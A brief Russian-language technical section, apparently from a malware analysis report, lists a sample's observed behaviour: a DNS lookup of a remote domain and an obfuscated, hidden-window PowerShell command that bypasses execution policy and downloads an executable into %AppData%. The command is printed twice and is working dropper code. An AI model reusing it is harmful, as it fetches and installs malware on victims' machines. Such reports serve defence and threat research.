Техническая информация
- http://derek-rapheal.co.uk/kesatur/event.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POweRSHelL.exE -EXeCUtIonpolicy bypaSs -noPRofILE -WInDoWStYlE HIDDen (New-object sYsteM.NeT.WEBClIenT).DoWnlOAdfIle('http://derek-rapheal.co.uk/kesatur/Event.exe','%AppDAtA%.eXe'...
- DNS ASK de####rapheal.co.uk
- '<SYSTEM32>\cmd.exe' /C "POweRSHelL.exE -EXeCUtIonpolicy bypaSs -noPRofILE -WInDoWStYlE HIDDen (New-object sYsteM.NeT.WEBClIenT).DoWnlOAdfIle('http://derek-rapheal.co.uk/kesatur/Event.exe','%AppDAtA%.eXe'...' (со скрытым окном)